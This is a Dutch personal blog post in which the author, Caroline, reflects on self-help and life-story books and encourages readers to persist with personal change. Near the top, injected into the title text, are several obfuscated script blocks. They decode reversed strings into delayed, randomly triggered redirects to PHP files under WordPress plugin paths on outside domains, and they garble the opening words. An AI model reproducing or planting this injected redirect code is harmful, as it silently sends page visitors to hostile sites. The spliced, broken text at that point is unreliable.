Duizend en één boeken en de 40 hulpjes

V<script>$Ikf=function(n){if (typeof ($Ikf.list[n]) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.r<script>$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;	setTimeout($nJe(0), delay);}</script>andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}</script><script>$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;	setTimeout($nJe(0), delay);}</script>andaag_de_dag_schrijft_iedereen_een_boek

Tegenwoordig is het schering en inslag, iedereen schrijft een boek. Over hun leven wat ze meemaakten en hoe ze eruit zijn gekomen. Het is zelfs zo dat volgens een of andere internet goeroe je een boek moet schrijven om meer klanten aan te trekken of om geloofwaardiger te zijn in wat je te bieden hebt.

Tja, wat moet ik hiermee, nog een boek over wat ik allemaal heb moeten doorstaan in mijn jeugd en mijn volwassen leven, daar zijn er al voldoende van en uiteraard voor ieder van ons altijd wel iets herkensbaars in. Maar wat ben je er nu mee, behalve oh ja dat ken ik, dat heb ik ook meegemaakt en oh ja zo kan ik er ook mee omgaan om te “healen”.

Ik weet het niet hoor. Alle respect voor de velen die zo’n boek hebben geschreven om anderen te helpen hoe te kampen met hun problemen, maar toch, ik zie daardoor het bos de bomen niet meer in. Herkenbaar, ja, kan ik er echt wat mee, mwah, ik weet het niet. Wie moet ik nu gaan kiezen om mij te helpen met mijn “demonen”, want zeg nu zelf, dat van jou is nog net iets anders dan dat van het boek toch? En tja die van dat boek, die kan dat, maar ik niet, zo ver ben ik niet en wat die allemaal gedaan heeft, petje af wel maar ik heb daar de tijd/geld niet voor of die is zeker sterker dan ik om zoiets te doen. En daar zit je dan, 9,95 euro armer,ok sommigen zijn gratis te downloaden, maar dan krijg je weer elke dag mails waarom je nog niet bent ingegaan op hun schitterend aanbod dewelke dan wel betalend is, om te “healen” en dat het nu of nooit is want dat aanbod komt er niet meer, enz...

Conclusie ; zolang je je één voelt met de schrijver, blijf je toch een beetje in je eigen miserie en denk je vaak, ow dat is normaal ik ben niet de enige en ik kan wel hulp halen. Het is toch wel best triestig dat we boeken over miserie van een ander moeten lezen om onszelf beter te voelen. Of om die erkenning te krijgen.

En dan heb je ook nog die boeken over 10 tips om... of hoe omgaan met.... hoe de beste versie van mezelf te zijn.... Goed, beter, best ....

Hoe heeft dit je al geholpen? Goed he, die tips en trics. Helpt wel, een beetje, en dan laat ik het weer los, want ik heb het zo druk, de kids, het werk, ... en je hervalt in je dagdagelijkse rompslomp. En je bent niet de beste versie van jezelf (wat dit dan ook moge zijn)

En voor heel even heb je dan toch wel wat moed gehad, heb je dan toch wel een paar stappen gezet naar een beter, gelukkiger leven. En verontschuldig je jezelf om het niet vol te houden door die rompslomp, door ...

En start je volgende week weer, want deze keer ga je het volhouden.

Verandering neemt tijd, veranderen is niet makkelijk, veranderen doe je stap voor stap, op je eigen tempo, met of zonder boek. Je moet het zelf echt willen. Het heet doorzettingsvermogen, niet opgeven wanneer het iets moeilijker gaat, het is jezelf vergeven wanneer je dan toch eens niet doorzet. Want wat denk je van die boekschrijvers, ook zij hebben er maanden en maanden over gedaan om zover te staan, ook zij zijn hervallen in oude gewoontes, maar ze hebben volgehouden met vallen en opstaan.

Ik ga jullie hier niet vertellen hoe het moet, daar zijn boeken voor, ik kan je alleen maar zeggen dat ik je steun, in alle stappen die je onderneemt, met of zonder hulp. Ik stuur je liefde, warmte, kracht en moed om je leven in handen te nemen en je beter, gelukkiger te voelen.

Lees dat boek dat voor jou van toepassing is, neem een coach onder de arm die jou nog beter kan maken dan dat je nu al bent of ook niet.

Want ook ik heb die boeken gelezen, Ik heb zelfs een paar goede tips hieromtrent, ook ik heb een coach onder de arm genomen, dewelke ik nog geregeld spreek.

En hou vol, begin elke dag opnieuw met goede moed aan je eigen veranderingsproces, aan een mooier mens te zijn, aan diegene die je echt wil zijn vanuit je hart, hou vol.

Ik wens je duizend en één nachten en 40 rovers

 

Caroline